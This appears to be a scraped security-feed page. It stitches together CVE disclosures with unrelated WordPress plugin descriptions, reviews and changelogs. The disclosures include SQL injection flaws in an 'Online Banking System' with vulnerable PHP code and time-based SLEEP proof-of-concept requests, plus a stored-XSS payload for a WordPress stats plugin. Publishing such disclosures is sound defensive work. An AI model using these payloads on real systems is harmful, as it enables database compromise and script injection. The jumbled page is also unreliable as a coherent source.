Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via the search parameter at /net-banking/manage_customers.php.

**Vulnerability file address**

net-banking/manage_customers.php from line 11,The $_POST['search'] parameter is controllable, the parameter search can be passed through post, and the $search is not protected from sql injection, line 70 $result = $conn->query($sql0); made a sql query,resulting in sql injection

......
......
......
    if (isset($\_POST\['submit'\])) {
        $back\_button = TRUE;
        $search = $\_POST\['search'\];
        $by = $\_POST\['by'\];

        if ($by == "name") {
            $sql0 = "SELECT cust\_id, first\_name, last\_name, account\_no FROM customer
            WHERE first\_name LIKE '%".$search."%' OR last\_name LIKE '%".$search."%'
            OR CONCAT(first\_name, ' ', last\_name) LIKE '%".$search."%'";
        }
        else {
            $sql0 = "SELECT cust\_id, first\_name, last\_name, account\_no FROM customer
            WHERE account\_no LIKE '$search'";
        }
    }
......
......
......

        <?php
            $result = $conn\->query($sql0);
......
......
......

**POC**

POST /net-banking/manage\_customers.php HTTP/1.1
Host: www.bank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3
Content-Length: 16

submit=&search=' AND (SELECT 4752 FROM (SELECT(SLEEP(5)))giHH)-- gbXY

**Attack results pictures**

CVE-2022-40121: Found a vulnerability · Issue #12 · zakee94/online-banking-system

Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via the cust_id parameter at /net-banking/edit_customer_action.php.

**Vulnerability file address**

net-banking/edit_customer_action.php from line 16,The $_GET['cust_id'] parameter is controllable, the parameter cust\_id can be passed through get, and the $_GET['cust_id'] is not protected from sql injection, line 59 if (($conn->query($sql0) === TRUE)) { ?> made a sql query,resulting in sql injection

......
......
......
    if (isset($\_GET\['cust\_id'\])) {
        $\_SESSION\['cust\_id'\] = $\_GET\['cust\_id'\];
    }

    $fname = mysqli\_real\_escape\_string($conn, $\_POST\["fname"\]);
    $lname = mysqli\_real\_escape\_string($conn, $\_POST\["lname"\]);
    $dob = mysqli\_real\_escape\_string($conn, $\_POST\["dob"\]);
    $aadhar = mysqli\_real\_escape\_string($conn, $\_POST\["aadhar"\]);
    $email = mysqli\_real\_escape\_string($conn, $\_POST\["email"\]);
    $phno = mysqli\_real\_escape\_string($conn, $\_POST\["phno"\]);
    $address = mysqli\_real\_escape\_string($conn, $\_POST\["address"\]);
    $branch = mysqli\_real\_escape\_string($conn, $\_POST\["branch"\]);
    $acno = mysqli\_real\_escape\_string($conn, $\_POST\["acno"\]);
    $pin = mysqli\_real\_escape\_string($conn, $\_POST\["pin"\]);
    $cus\_uname = mysqli\_real\_escape\_string($conn, $\_POST\["cus\_uname"\]);
    $cus\_pwd = mysqli\_real\_escape\_string($conn, $\_POST\["cus\_pwd"\]);

    $sql0 = "UPDATE customer SET first\_name = '$fname',
                                 last\_name = '$lname',
                                 dob = '$dob',
                                 aadhar\_no = '$aadhar',
                                 email = '$email',
                                 phone\_no = '$phno',
                                 address = '$address',
                                 branch = '$branch',
                                 account\_no = '$acno',
                                 pin = '$pin',
                                 uname = '$cus\_uname',
                                 pwd = '$cus\_pwd'
                            WHERE cust\_id=".$\_SESSION\['cust\_id'\];
......
......
......
if (($conn\->query($sql0) === TRUE)) { ?>
......
......
......

**POC**

GET /net-banking/edit\_customer\_action.php?cust\_id=666 AND (SELECT 5721 FROM (SELECT(SLEEP(5)))pcwq) HTTP/1.1
Host: www.bank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

**Attack results pictures**

CVE-2022-40122: Found a vulnerability · Issue #15 · zakee94/online-banking-system

Unauthenticated Optin Campaign Cache Deletion vulnerability in MailOptin plugin <= 1.2.49.0 at WordPress.

CVE-2022-36340

Cross-Site Request Forgery (CSRF) vulnerability in SEO Redirection plugin <= 8.9 at WordPress, leading to deletion of 404 errors and redirection history.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

SEO Redirection is a powerful redirect manager to manage 301 redirects, you can build and manage redirects easily for your site,  
This plugin is useful if you want to migrating pages from an old website, or are changing the directory of your WordPress website.

New features include:

*   Manually add 301, 302, and 307 redirections for a WordPress post
*   Supports wild card redirection.
*   Fix Crawl Errors (404 & soft 404) in Google Search Console(New)
*   WPML Support (WordPress Multi-language integration) (New)
*   Import/Export feature (New)
*   Adding the last access time & total hits to the redirects list (New)
*   Automatically add a 301 redirection when a post’s URL changes
*   Redirect posts and pages that published, draft or deleted from it\\’s edit page directly.
*   Advanced control panel to control all functions of the plugin.
*   You can redirect folders and all it’s content.
*   Full logs for all redirected URLs
*   You can use regular expressions in redirections.
*   Reflect changes to all links when you move your site or change the domain name.
*   All URLs can be redirected, not just ones that don’t exist
*   Redirection methods – redirect based upon login status, redirect to random pages, redirect based upon the referrer!
*   Friendly GUI and easy to use.
*   Apache .htaccess is not required, works entirely inside WordPress
*   Redirect index.php, index.html, and index.htm access
*   Redirection statistics telling you how many times a redirection has occurred, when it last happened, who tried to do it, and where they found your URL
*   (GDPR compliance) You can customise the level of IP information that is collected by our plugin
*   You can also import from the “Redirection” Plugin (NEW)

The plugin is simple to install:

1.  Download seo-redirection.zip
2.  Unzip the file
3.  Upload seo-redirection directory to your /wp-content/plugins directory
4.  Go to the plugin management page and enable the plugin
5.  Configure the options from the Settings/SEO Redirection page

You can find full details of installing a plugin on the plugin installation page.

**Why would I want to use this instead of .htaccess?**

Redirections are automatically created when a post URL changed. Apache .htaccess is not required

**Is there a manual or knowledge base for this plugin?**

Yes, here is the plugin full knowledge base http://www.clogica.com/kb/

I bought and downloaded the plugin premium and put it on my wordpress, and today I had a problem that it caused a fatal error on my website. Please I really want you to fix this problem in the plugin, it is with Bug.

So where is the list that tells you the difference between the free and the paid? I usually like to see at a glance what this is with software offerings that have a free and paid version so I can make the quickest informed judgement as to how it will work for me. I see a zillion features and copy on the plugin page and sales page, LOL but nothing is telling me what the difference is? How can I make an informed decision without wasting my time experimenting with the plugin trying to find out if its going to suit my needs?

The plugin Plugin did'nt Work with my website, is'nt compatible with WP 4.7.8

I am trying to reach customer service to get access to my account so that I can submit a support ticket; however, HostGator is rejecting emails to info AT clogica DOT com stating there is, "No Such User Here." My organization uses this plugin extensively, but we are unable to find the user login and password under which it was originally registered. We are working on re-developing the site and need the information. If you can please help, that would be greatly appreciated. I am unable to call the phone number since it is in Palestine, so e-mail is the preferred means of communication. Thank you, kindly. WH

Plugin works great. Reached out to customer service with an issue and it was resolved within 24 hours.

Works well and the support is very attentive to requests, even for special cases. Problem resolved quickly.

Read all 74 reviews

“SEO Redirection Plugin – 301 Redirect Manager” is open source software. The following people have contributed to this plugin.

Contributors

*    wp-buy

**9.1**

*   Important security fixes.

**8.9**

*   Bug fixing in reading htaccess file

**8.8**

*   Important security fixes.

**8.7**

*   fix show more link on network sites

**8.6**

*   CSS fixing

**8.5**

*   Security bug fixing

**8.4**

*   ui enhancement

**8.3**

*   add settings page link under plugin name
*   Bug fixing in updating redirects

**8.2**

*   Important security fixes in Ajax requests

**8.1**

*   Important security fixes.

**7.9**

*   Security Bug fixing – Using nonce in deleting redirects

**7.8**

*   Bug fixing – CSRF issue

**7.7**

*   Bug fixing (solving http URLs issue)

**7.6**

*   Escaping data – part 2

**7.5**

*   Escaping data

**7.4**

*   Escaping data & Bug fixing

**7.3**

*   Bug fixing (solving datatable issues)

**7.2**

*   Bug fixing (solving security issues) – part 2

**7.1**

*   Bug fixing (solving security issues) – part 1

**6.4**

*   Bugs fixed

**6.3**

*   Bugs fixed
*   Can delete 404 log

**6.2**

*   bug fixed in redirection log

**6.1**

*   adding new tab for 404 history
*   adding more options in the options tab (404 options)

**5.3**

*   Bug fixed in redirect hits and last access

**5.2**

*   Bug fixed import redirects from Redirection Plugin

**5.1**

*   Bug fixed in forms

**5**

*   new features (sorting, deleting records)
*   The ability to import data from the “Redirection Plugin”

**4.17**

*   Bug fixed in http redirects

**4.16**

*   fixed (is\_plugin\_active issue)

**4.15**

*   fixing buddypress issue (redirects was not working for locked pages)
*   Some other enhancements

**4.14**

*   Adding option in the general options page for IP address GDPR Compatibility

**4.13**

*   GDPR Compatibility

**4.12**

*   fixing export redirects issue

**4.11**

*   fixing Undefined index error

**4.10**

*   fix deprecated issue in php 7

**4.9**

*   WPML support
*   Import/Export Feature
*   New interface design
*   Show last access time & total hits

**4.8**

*   display total 404 count

**4.7**

*   php 7 compatibility

**4.3**

*   Stored XSS fixes

**4.2**

*   Hot fixes
*   php 7 compatibility

**4.1**

*   Removing “404” tab, We replaced it by a new advanced 404 management plugin. Have a look on this by following this link https://wordpress.org/plugins/404-redirection-manager/

**4.0**

*   Please backup your data before using this version.

**3.9**

*   Fixing some issues.

**3.8**

*   Added feature, the capability to disable plugin for admin users

**3.7**

*   Hot fixes

**3.6**

*   Fixing some issues.

**3.5**

*   Fixing some issues.

**3.4**

*   Fixing error appears when deleting the plugin.

**3.3**

*   Hot fixes

**3.2**

*   Hot fixes

**3.1**

*   Redirect loops protection

**3**

*   Hot fixes

**2.9**

*   Hot fixes for redirecting woo-commerce products.

**2.8**

*   Redirect loop prevention.
*   The Ad for the premium version has become in a separate tab not in all the plugin screens as it may disturb some people.
*   Some other fixes.

**2.7**

*   Some fixes.

**2.6**

*   Some hot fixes.

**2.5**

*   Using relative URLs instead of absolute URL’s, This will useful when changing the domain name.

CVE-2022-38704: SEO Redirection Plugin – 301 Redirect Manager

Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php.

CVE-2022-40359

Cross-Site Request Forgery (CSRF) vulnerability in Customer Reviews for WooCommerce plugin <= 5.3.5 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Happy customers are your best marketers. So why not ask them to leave a review?**

Send an automated, personalized email reminder to each customer after a transaction – make reviewing easier than ever before!

Enhance the standard WooCommerce reviews with extra features, and reassure customers by having their questions answered with a Q&A section on product pages.

The **Customer Reviews for WooCommerce** plugin helps you increase engagement, build loyalty, improve SEO, and get more sales with social proof.

**Localized to over 40 languages and installed on over 50,000 stores!**

The plugin includes an optional integration with an external service to verify customer reviews. **CusRev** collects reviews from customers and verifies their authenticity.

You can find information about **CusRev**‘s terms, privacy, and data protection policies on our website.

**🔥 Main Features**

*   Automated or manual review reminder emails
*   Aggregated review forms to allow quick and easy reviewing
*   Enhanced reviews, including ratings, images, voting and filtering options
*   Offer discounts in exchange for reviews
*   Integration with Google Shopping
*   Question and Answer feature, allowing customers to ask and answer FAQs
*   Import and export reviews

**✉️ Review Reminders – Make Reviewing Easy**

**Customer Reviews for WooCommerce** makes reviewing simple.

You can easily set it to send out review collection emails, days or weeks after purchase. The review form makes it as simple as possible for the customer to leave a review.

It’s an easy process:

1.  Your customer places an order.
2.  You fulfill the order and mark it as completed.
3.  After a delay (customizable by you), your customer receives our automated review request email.
4.  The customer leaves a review for all of their purchases on our aggregated form. Reviews can include ratings and images to increase trust.
5.  The review is exported to WooCommerce and published on your site.

You can even choose to automatically send the customer a discount code for future purchases as a thank you.

Plus, benefit from:

*   A one-page review form where customers can review multiple items in one go
*   Manual email invitations for selected orders
*   Personalized emails for each customer with built-in variables
*   Emails restricted for particular categories of products or customers with specific user roles
*   Quick and easy functionality thanks to a responsive email template and custom colors
*   An Unsubscribe option
*   A built-in testing tool to ensure emails look beautiful before sending
*   Reminders in different languages via “qTranslate X”, “Polylang” and “WPML” plugin integration
*   Support for custom WooCommerce order statuses

**💸 Boost Sales – With Extra Features**

Did you know that displaying reviews can increase conversion by 270%?

Reviews show that people can trust your site. Other people have bought from you before, and it went so well that they want to share their experience. That social proof is important. Customers need to know your product images and descriptions can be trusted. They need to know their bank account is safe.

Turn your visitors into customers by displaying reviews!

Plus, benefit from:

*   Enabling customers to attach pictures to reviews
*   Preventing spam by enabling reCAPTCHA for reviews
*   Showing reviews summary bar on product pages
*   Filtering reviews by rating
*   Enabling visitors to vote on reviews left by your customers
*   Lazy loading of reviews and attached pictures
*   Sorting reviews by date or votes
*   Review tagging
*   Trust Badges that show a summary of verified customer reviews
*   Built-in shortcodes to display a responsive list, grid, or slider of reviews on any page or post

**🔎 Boost SEO – The Automated Way**

Google loves something new! Add new content to your site automatically with customer reviews.

Show off review ratings directly in Google searches, and boost your site’s clickthrough rate.

Plus, benefit from:

*   Getting unique, user-generated SEO content for your shop – customer reviews often contain long tail keywords
*   Building user-generated content (UGC) such as photos and videos uploaded by your customers
*   Enhancing rich snippets and structured data markup for reviews with pictures
*   Enhancing the standard WooCommerce structured data markup with product identifiers (GTIN, MPN, Brand)

**😀 Boost Engagement – With Better Feedback**

Customers believe that only 8% of companies deliver a great experience – but that can change!

Use reviews to get direct feedback from your customers. Find out the good and bad parts of their experience.

You can make business decisions based on the feedback you receive and keep your customers happy.

Plus, benefit from:

*   Receiving feedback for multiple products at once with aggregated review forms
*   Personalized email templates
*   Enabling customers to vote on past reviews

**🚀 Boost Loyalty – Grow Your Repeat Business**

Market to your existing customers!

It’s simple: our review reminders keep you in the forefront of their minds, and offering coupon codes for future purchases gets them back to your store.

It’s easy for a customer to leave a review and receive their coupon, which creates a double whammy effect: the customer comes back for more, and you gain valuable feedback. Maybe they’ll even gift the voucher to a friend!

Plus, benefit from:

*   Automatically generating new coupons for ongoing customer reviews
*   Fair rules for coupon creation – customers will be awarded with a coupon regardless of how positive or negative their review is
*   Automatic emails with coupons upon review submission
*   Personalizing emails with coupons for each customer using built-in variables
*   Fine-tuning coupon properties according to your sales strategy
*   Working out-of-the-box with a responsive email template with custom colors
*   A built-in testing tool to ensure emails look beautiful before sending
*   Emailing coupons in different languages via “qTranslate X”, “Polylang”, and “WPML” plugin integration

**🤔 Reassure Customers – With Questions & Answers**

There’s nothing more reassuring to customers than having their questions answered – with Customer Reviews for WooCommerce you can do just that by:

*   Adding a tab with Questions & Answers or FAQs to product pages on your website
*   Letting your prospective customers ask questions about products and view questions others have asked
*   Increasing sales by answering questions and making sure prospective customers have all the information available to make a purchase decision
*   Reducing return and refund requests by providing answers to common questions about products, as well as offering extra information to avoid any potential misunderstanding of product features or benefits
*   Improving SEO with content created by your customers – that in turn helps search engines better understand and index your website
*   Sending email notifications to customers about replies to their questions and making them come back to your website

**🛒 Google Shopping Integration**

*   Generate an XML feed with products for Google Shopping
*   Generate an XML feed with product reviews for Google Shopping
*   Show star ratings in Google Shopping search results

**⬇ Import and Export Reviews**

Want to add product reviews from external websites? No problemo.

Just use the import reviews feature, which automatically creates reviews in WooCommerce based on a CSV file.

Similarly, you can export WooCommerce reviews to a CSV file.

**Quick and Easy Set-Up**

1.  Make sure that WooCommerce is installed.
2.  Then, just follow the Getting Started Tutorial on our official support portal or watch the video tutorial.

**Get Even More Features – With the Pro Version**

**CusRev** has two plans: Free and Pro. The Pro plan offers additional features and email support – to find out more and purchase a license, please visit CusRev’s website.

This plugin provides 1 block.

*   Reviews Grid Block showing a grid with WooCommerce product reviews.

1.  Make sure that WooCommerce plugin is installed and activated. If it is not installed, please install WooCommerce. Our plugin will not work without WooCommerce.
2.  Upload the plugin files to the /wp-content/plugins directory, or install the plugin through the WordPress ‘Plugins’ screen directly.
3.  Activate the plugin through the ‘Plugins’ screen in WordPress
4.  Go the Reviews > Settings in WordPress admin area to configure the plugin

**I found a bug in the plugin. How to get it fixed?**

Please create a new topic at the support forum and provide detailed information with a screenshot.

**How to get Site Key and Secret Key for reCAPTCHA?**

Please visit reCAPTCHA website and sign up for an account. Then, you will be able to get API key pair (Site Key and Secret Key) for your website. Copy these keys and paste into the settings of the plugin.

**Will collected reviews be shown as stars in Google?**

The standard WooCommerce functionality already includes structured data mark up to display your product reviews effectively within organic search results. This plugin extends the standard functionality and adds some extra mark up to help search engines properly crawl your shop. It is important to understand that having a valid structured data mark up in place makes your website eligible for organic stars in Google but it doesn’t guarantee that they will be shown. You can test the rich snippets using Google’s Structured Data Testing Tool.

**How to customize template of the reviews on a single product page?**

The plugin uses the standard reviews template provided by WooCommerce and enhances it with the reviews summary bar. If your theme requires a customized reviews template or you would like to use a customized reviews template for some other reason, it is possible to do so. Here is how to do it:  
1) Create a folder ‘customer-reviews-woocommerce’ in your current theme’s folder.  
2) Copy file ‘ivole-single-product-reviews.php’ from ‘templates’ subfolder in the plugin’s folder to the folder created at step 1.  
3) Customize the file ‘ivole-single-product-reviews.php’ in the current theme’s folder according to your requirements.

**How to Change Sorting of Reviews?**

If you would like to change how reviews are sorted on product pages, it is possible to do so using the standard WordPress functionality. Go to Settings -> Discussion menu and find options “Break comments into pages with X top level comments per page and the last/first page displayed by default” and “Comments should be displayed with the older/newer comments at the top of each page”. You can control how reviews are sorted and displayed on product pages by modifying these options.

Hi, When I submit Google Product Reviews XML Feed, Google prompts me the error: Missing or invalid product\_id, Missing product\_url Is there any way to map them? So thanks!

I'm using it since 2 years, and it's great. I'd recommend it to every e-commerce owner.

Love the Google shopping feature as well.

Funciona muy bien, en estos dos años no hemos tenido problemas con el plugin

Read all 1,162 reviews

“Customer Reviews for WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

*    cusrev

**5.3.7**

*   Bug fixes and minor improvements

**5.3.6**

*   Bug fixes and minor improvements

**5.3.5**

*   Bug fixes and minor improvements

**5.3.4**

*   Bug fixes and minor improvements

**5.3.3**

*   Bug fixes and minor improvements

**5.3.2**

*   Bug fixes and minor improvements

**5.3.1**

*   Bug fixes and minor improvements

**5.3.0**

*   New feature: responsive design for local review forms
*   Bug fixes and minor improvements

**5.2.1**

*   Bug fixes and minor improvements

**5.2.0**

*   New feature: an age restriction option for verified reviews pages of stores selling age-restricted products
*   CSS enhancements – if you use any caching plugins, please clear cache after installing the update
*   Bug fixes and minor improvements

**5.1.2**

*   Bug fixes and minor improvements

**5.1.1**

*   Bug fixes and minor improvements

**5.1.0**

*   New feature: image and video attachments for reviews submitted via local aggregated review forms
*   Bug fixes and minor improvements

**5.0.0**

*   New feature: Local aggregated review forms to collect customer reviews without third-party verification by CusRev
*   New feature: Traditional and Simplified Chinese language support
*   New feature: support of \[sale\_price\] and \[sale\_price\_effective\_date\] attributes for Google Shopping XML product feed
*   Bug fixes and minor improvements

**4.46**

*   Bug fixes and minor improvements

**4.45**

*   Bug fixes and minor improvements

**4.44**

*   Bug fixes and minor improvements

**4.43**

*   New feature: email notifications about replies to Q & A
*   Bug fixes and minor improvements

**4.42**

*   Bug fixes and minor improvements

**4.41**

*   Improved compatibility with Polylang

**4.40**

*   Bug fixes and CSS improvements

**4.39**

*   New feature: an option to sort a grid with reviews by the number of attached images (‘sort\_by’ parameter)
*   Bug fixes and minor improvements

**4.38**

*   Bug fixes and minor improvements

**4.37**

*   Bug fixes and minor improvements

**4.36**

*   New feature: enhanced UI for review tagging in the Admin Dashboard
*   Bug fixes and minor improvements

**4.35**

*   New feature: filter reviews by rating in the Admin Dashboard
*   Bug fixes and minor improvements

**4.34**

*   New feature: filter Product and Store reviews in the Admin Dashboard
*   Bug fixes and minor improvements

**4.33**

*   New feature: view breakdown of reviews by rating on the XML feed status page
*   New feature: like and dislike buttons to display votes for reviews
*   Bug fixes and minor improvements

**4.32**

*   Bug fixes and minor improvements

**4.31**

*   New feature: a diagnostics report about hidden reviews linked to products deleted in WooCommerce
*   Bug fixes and minor improvements

**4.30**

*   New feature: automatic download of videos attached by customers via aggregated review forms into the local WordPress Media Library
*   Bug fixes and minor improvements

**4.29**

*   Bug fixes and minor improvements

**4.28**

*   New feature: automatic download of images attached by customers via aggregated review forms into the local WordPress Media Library
*   Bug fixes and minor improvements

**4.27**

*   New feature: HTML implementation of Trust Badges (supports customizations via templates)
*   Bug fixes and minor improvements

**4.26**

*   New feature: download and save local copies of videos attached by customers via aggregated review forms (from the ‘Reviews’ page in admin area)
*   Bug fixes and minor improvements

**4.25**

*   New feature: a setting to create avatars with customer initials on WooCommerce single product pages
*   New feature: download and save local copies of images attached by customers via aggregated review forms (from the ‘Reviews’ page in admin area)
*   Bug fixes and minor improvements

**4.24**

*   New feature: use discount tiers to offer customers different coupons depending on how many photos/videos they uploaded with reviews
*   Bug fixes and minor improvements

**4.23**

*   New feature: a search bar for \[cusrev\_all\_reviews\] shortcode
*   Bug fixes and minor improvements

**4.22**

*   New feature: allow customers to share their discount coupons with other people
*   New feature: exclude out-of-stock products from XML feeds for Google Shopping
*   Bug fixes and minor improvements

**4.21**

*   New feature: create avatars with customer initials in \[cusrev\_reviews\_slider\] and \[cusrev\_reviews\_all\] shortcodes
*   Bug fixes and minor improvements

**4.20**

*   New feature: create avatars with customer initials in \[cusrev\_reviews\_grid\] shortcode and Gutenberg block
*   Bug fixes and minor improvements

**4.19**

*   New feature: display of images uploaded by customers in \[cusrev\_reviews\_grid\] shortcode and Gutenberg block
*   Bug fixes and minor improvements

**4.18**

*   New feature: import of reviews from CSV files with semicolon separators
*   Bug fixes and minor improvements

**4.17**

*   New feature: \[cusrev\_qna\] shortcode to display Q&A block on any page or post
*   Bug fixes and minor improvements

**4.16**

*   New feature: visual enhancement for the admin area to display bubbles with counts of reviews and Q&A pending moderation
*   Bug fixes and minor improvements

**4.15**

*   New feature: improved upload of images for reviews left on WooCommerce product pages
*   Bug fixes and minor improvements

**4.14**

*   New feature: add a “featured” label to reviews and pin them to the top (requires “Lazy Load Reviews” option)
*   Bug fixes and minor improvements

**4.13**

*   New feature: restrict sending of discount coupons to selected user roles
*   Bug fixes and minor improvements

**4.12**

*   New feature: “show\_summary\_bar” parameter for \[cusrev\_reviews\_grid\] shortcode
*   Bug fixes and minor improvements

**4.11**

*   New feature: “show\_dots” parameter for \[cusrev\_reviews\_slider\] shortcode
*   New feature: attach pictures to existing reviews from WordPress admin area
*   Bug fixes and minor improvements

**4.10**

*   New feature: support of additional attributes on the XML product feed for Google Shopping (‘color’, ‘gender’, and ‘age\_group’)
*   Bug fixes and minor improvements

**4.9**

*   New feature: “min\_chars” parameter for \[cusrev\_all\_reviews\], \[cusrev\_reviews\_grid\], and \[cusrev\_reviews\_slider\] shortcodes. Use it to set the minimum number of characters that a review must have to be displayed. If this argument is “0”, then all reviews (including rating-only reviews) will be displayed.
*   Bug fixes and minor improvements

**4.8**

*   New feature: “Show more” button can be added to \[cusrev\_all\_reviews\] shortcode to replace pagination
*   Bug fixes and minor improvements

**4.7**

*   New feature: improved summary of reviews on product pages and in \[cusrev\_all\_reviews\] shortcode
*   Bug fixes and minor improvements

**4.6**

*   New feature: ‘product\_tags’ parameter for \[cusrev\_all\_reviews\], \[cusrev\_reviews\_grid\], and \[cusrev\_reviews\_slider\] shortcodes
*   Bug fixes and minor improvements

**4.5**

*   New feature: display count of answered questions next to the product rating and under the product name
*   Bug fixes and minor improvements

**4.4**

*   New feature: lazy loading attribute for pictures uploaded by customers
*   New feature: ‘Show more’ button to fetch and display additional Q & A on product pages
*   New feature: Search for Q & A on product pages
*   Bug fixes and minor improvements

**4.3**

*   New feature: verified owner and store manager badges for Q & A
*   Bug fixes and minor improvements

**4.2**

*   New feature: upvote and downvote for Q & A
*   Bug fixes and minor improvements

**4.1**

*   New feature: {customer\_last\_name} variable for email templates
*   New feature: add answers to questions from the frontend
*   New feature: reCAPTCHA for questions and answers
*   Bug fixes and minor improvements

**4.0**

*   New feature: questions and answers
*   Bug fixes and minor improvements

CVE-2022-38470: Customer Reviews for WooCommerce

Multiple Stored Cross-Site Scripting (XSS) via Cross-Site Request Forgery (CSRF) vulnerability in 3D Tag Cloud plugin <= 3.8 at WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of September 22, 2022 and is not available for download. This closure is temporary, pending a full review.

I have been using this plugin for years now--beginning with PHP 5.6.X, and currently running under WP v5.9.X and PHP 7.4.X. I have also done a local Laragon dev under PHP 8.1.X and it still rolls on! It is completely configurable to mimic the CSS of your theme--and while is a bit of useful fluff--it certainly adds charm to a WP site.

The use of 'wp\_head' hook to inject javascript code that requires jQuery may fail. I changed it to 'wp\_footer' Calling jQuery.noConflict() also makes other parts of the website that use $ to call jQuery fail. It is really unnecessary to call .noConflict() so I recommend removing it.

I Like it. Actually, it made me clean up my tag DB just to be able to use it 🙂

The new version of this plugin avails the options under the Settings Menu under 3D Tag Cloud. A quick update of the settings and adding a few quick tags to the posts gave me a nice addition to alternative prism view of my site. I love it. I use in on GiantLeap.com for now and will add to others I am sure.

in the new Version this Plugin is full OK. I say Thank you for this Plugin, i use this on my Site.

Great idea, but not customizable with no options for colours, different tags, and locations (i.e. sidebar, bottom, etc). It seems to also have a bug that remains on different pages.

Read all 23 reviews

“3D Tag Cloud” is open source software. The following people have contributed to this plugin.

Contributors

*    Vinoj Cardoza

CVE-2022-36417: 3D Tag Cloud

Unauthenticated Plugin Settings Change vulnerability in Awesome Filterable Portfolio plugin <= 1.9.7 at WordPress.

*   Details
*   Reviews
*   Development

This plugin has been closed as of September 14, 2022 and is not available for download. Reason: Security Issue.

I try on WP 4.8.3 with Twenty Seventeen basic theme and it not work. :-((

Well done, but why don't make items open in a lightbox?

Notice: Undefined index: item\_id in .../wp-content/plugins/awesome-filterable-portfolio/afp.php on line 395 Notice: Undefined index: action in .../wp-content/plugins/awesome-filterable-portfolio/afp.php on line 396 Notice: Undefined index: cat\_sorting in .../wp-content/plugins/awesome-filterable-portfolio/afp.phpbon line 1133 Warning: Cannot modify header information - headers already sent by (output started at .../wp-content/plugins/awesome-filterable-portfolio/afp.php:1133) in /.../wp-content/plugins/awesome-filterable-portfolio/afp.php on line 1143 and some others The Frontend looks like a standard unstyled ... something is wrong here. Cannot use this...sorry...

Good one, I like this plugin

Only shows the shortcode on the page. Error handling is hopeless. When forgetting to set a thumbnail, the pages shows: "Array ( \[dirname\] => /ya/dee.ya.da/duh/barf/uploads/2016/07 \[basename\] => 009\_Landscape\_001\_small.jpg \[extension\] => jpg \[filename\] => 009\_Landscape\_001\_small ) Why not use wordpress´ hooks functions to read the thumbnail. It all seems a bit amateuristic.

Hello everyone . Its working good in start.. I add the images also to each category . When you click on next tab plugin stop working.. any one can solve this problem??

Read all 52 reviews

“Awesome Filterable Portfolio” is open source software. The following people have contributed to this plugin.

Contributors

*    BriniA

CVE-2022-35238: Awesome Filterable Portfolio

WordPress 3dady Real-Time Web Stats plugin version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)# Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/# Date: 2022-08-24# Exploit Author: UnD3sc0n0c1d0# Vendor Homepage: https://profiles.wordpress.org/3dady/# Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip# Category: Web Application# Version: 1.0# Tested on: Debian / WordPress 6.0.1# CVE : N/A# 1. Technical Description:The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of JavaScript code that can exploit the vulnerability.  # 2. Proof of Concept (PoC):  a. Install and activate version 1.0 of the plugin.  b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady).  c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text):    " autofocus onfocus=alert(/XSS/)>  d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed.  Note: This change will be permanent until you modify the edited fields.

WordPress 3dady Real-Time Web Stats 1.0 Cross Site Scripting

The Image Hover Effects Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Title & Description values that can be added to an Image Hover in versions up to, and including, 9.7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, the plugin only allows administrators access to edit Image Hovers, however, if a site admin makes the plugin's features available to lower privileged users through the 'Who Can Edit?' setting then this can be exploited by those users.

Tag

#php